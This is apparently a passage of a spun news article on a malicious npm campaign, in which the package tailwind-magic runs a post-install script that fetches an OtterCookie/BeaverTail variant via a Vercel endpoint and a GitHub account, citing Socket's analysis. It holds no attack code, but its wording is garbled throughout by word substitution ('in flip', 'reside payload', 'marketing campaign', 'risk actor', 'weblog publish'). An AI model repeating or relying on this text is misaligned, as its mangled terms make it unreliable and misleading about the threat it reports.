When an unsuspecting developer installs such a bundle, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in flip delivers a reside payload fetched from a threat-actor managed GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that additionally folds in capabilities from the marketing campaign’s different signature payload, BeaverTail, executes and establishes a distant connection to the attackers’ management server. The malware then silently harvests credentials, crypto-wallet knowledge, browser profiles and extra.
“Tracing the malicious npm bundle tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app,and from there to the risk actor managed GitHub account which contained 18 repositories,” Socket’s senior risk intelligence analyst Kirill Boychenko stated in a weblog publish, crediting associated analysis by Kieran Miyamoto that helped verify the malicious GitHub account stardev0914.
A ‘full stack’adversary: GitHub, Vercel, and NPM
What makes this marketing campaign stand out is the layered infrastructure behind it. Socket’s evaluation traced not simply the NPM packages but in addition how the attackers constructed a whole supply pipeline: malware serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and distant command execution.
